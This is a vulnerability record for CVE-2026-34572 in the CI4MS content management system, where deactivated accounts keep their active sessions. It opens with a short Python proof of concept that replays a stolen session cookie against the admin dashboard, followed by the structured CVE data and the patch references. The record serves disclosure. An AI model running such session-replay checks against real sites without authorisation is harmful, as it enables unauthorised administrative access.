CVE-2026-34572

import requests # Exploit Title: CI4MS Session Fixation / Account Deactivation Bypass # Description: Demonstrates that a user remains authenticated after account deactivation. target_url = "http://target-ci4ms-site.com/admin/dashboard" # 1. Attacker obtains a valid session cookie (e.g., via XSS or previous access) valid_session_cookie = "ci4ms_session=abc123def456..." headers = { "Cookie": valid_session_cookie, "User-Agent": "Mozilla/5.0" } # 2. Administrator deactivates the account associated with this session in the backend. # (This step is performed outside the script by an admin) # 3. Attacker attempts to access the dashboard using the old session response = requests.get(target_url, headers=headers) if response.status_code == 200 and "dashboard" in response.text: print("[+] Vulnerability Confirmed: Access granted despite account deactivation.") else: print("[-] Access denied or session expired.")

{"cve": {"id": "CVE-2026-34572", "sourceIdentifier": "[email protected]", "published": "2026-04-01T22:16:21.180", "lastModified": "2026-04-06T16:32:05.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deactivated. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deactivated accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy and results in persistent unauthorized access, representing a critical security flaw. This issue has been patched in version 0.31.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-613"}, {"lang": "en", "value": "CWE-1254"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.31.0.0", "matchCriteriaId": "805F6B8A-9324-4CA4-BADE-439CC15DA14C"}]}]}], "references": [{"url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-8fq3-c5w3-pj3q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}